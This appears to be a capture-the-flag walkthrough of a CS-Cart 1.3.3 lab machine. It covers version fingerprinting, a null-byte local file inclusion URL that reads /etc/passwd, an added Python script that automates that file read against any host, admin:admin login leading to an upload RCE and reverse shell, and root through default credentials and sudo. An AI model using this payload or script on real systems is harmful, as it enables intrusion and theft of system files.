Enumeration

Nmap

An initial nmap scan showed SSH, HTTP and a few mail ports open.

[screenshot: nmap scan results]

Web Enumeration

Visiting the website showed it was running CS-Cart.

[screenshot: CS-Cart website]

To identify the CS-Cart version I found this forum post (https://forum.cs-cart.com/t/how-to-find-my-cs-cart-version/13327), which explains that appending ?version to the site URL (for example http://test.com/?version) makes the application print its version. Doing that on the target showed it was running CS-Cart 1.3.3.

[screenshot: ?version output showing CS-Cart 1.3.3]

Exploitation

CS-Cart 1.3.3 LFI

This version is vulnerable to local file inclusion (LFI) through the classes_dir parameter of the URL below. The trailing %00 is a null byte that truncates the PHP file name the script appends to the parameter; this trick only works on PHP older than 5.3.4, which is consistent with how old this install is.

http://<IP>/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

Reading /etc/passwd through the LFI showed a user named patrick.

[screenshot: LFI output of /etc/passwd]
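As an added example that is not part of the original write-up, the following Python script builds the LFI URL shown above for an arbitrary file, fetches it, and filters whatever comes back for /etc/passwd entries whose shell allows a login. The URL layout and the eleven-deep traversal are taken from the page; the target host, the file name argument and the sample passwd content used for the offline run are assumptions constructed for the example.

```python
"""Added example (not from the original write-up): pull /etc/passwd through the
CS-Cart 1.3.3 classes_dir LFI and list the accounts that have a login shell."""
import sys
import urllib.parse
import urllib.request

# Constructed sample of the kind of content the LFI returns, so the parser can
# be exercised offline when no target is given.  Names and UIDs are made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
"""

# Shells that do not allow an interactive login.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def lfi_url(base, target_file="/etc/passwd", depth=11):
    """Build the vulnerable URL from the write-up for an arbitrary file.

    depth copies the eleven '../' of the original URL; extra levels are
    harmless because traversal stops at '/'.  The trailing %00 is a NUL byte
    that truncates the PHP file name the script appends to classes_dir; it
    only works on PHP older than 5.3.4, which rejects NUL in include paths."""
    traversal = "../" * depth + target_file.lstrip("/")
    path = "/classes/phpmailer/class.cs_phpmailer.php?classes_dir="
    # quote() leaves '.', '-', '_' and (with safe="/") '/' untouched, so the
    # traversal survives; the NUL is appended as the literal %00 escape.
    return base.rstrip("/") + path + urllib.parse.quote(traversal, safe="/") + "%00"


def login_users(body):
    """Return (name, uid, shell) for each passwd entry in body whose shell
    permits a login.  The LFI output may be wrapped in PHP warnings or HTML,
    so only lines with the 7-field passwd shape and a numeric UID are kept."""
    users = []
    for line in body.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, _, uid, _, _, _, shell = fields
        if not shell or shell in NON_LOGIN_SHELLS:
            continue
        users.append((name, int(uid), shell))
    return users


def fetch(url, timeout=10):
    """GET the URL and return the body as text; undecodable bytes are replaced
    because the response can mix raw file content with HTML."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def main(argv):
    # Usage: python3 lfi_passwd.py http://<IP>   (no argument: offline sample)
    body = fetch(lfi_url(argv[1])) if len(argv) > 1 else SAMPLE_PASSWD
    for name, uid, shell in login_users(body):
        print(f"{name:<12} uid={uid:<6} shell={shell}")


if __name__ == "__main__":
    main(sys.argv)
```

Because the script only keeps well-formed passwd lines, it works whether the file comes back bare or embedded in a broken page; passing a different file name (for example /etc/hosts) reuses the same traversal and null-byte truncation.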

CS-Cart 1.3.3 RCE

This version is also vulnerable to an authenticated malicious file upload that leads to remote code execution; I used the exploit reatva/CS-Cart-1.3.3-RCE. It requires an admin login, so I first tried the admin login page with the default admin:admin credentials, and they worked.

[screenshot: admin login page]

[screenshot: logged in with admin:admin]

I then ran the exploit and got a reverse shell as www-data.

[screenshot: running the exploit]

[screenshot: reverse shell as www-data]

From there I read the user flag.

[screenshot: user flag]

Privilege Escalation

Default Credentials and sudo ALL

I tried several local privilege escalation methods, but none of them worked: the system was old and I could not get any of the usual tooling to run on it.

I then tried the default credentials patrick:patrick, and they worked. Running sudo -l showed that patrick could run any command as root via sudo, so sudo bash gave me a root shell.

[screenshot: root shell]

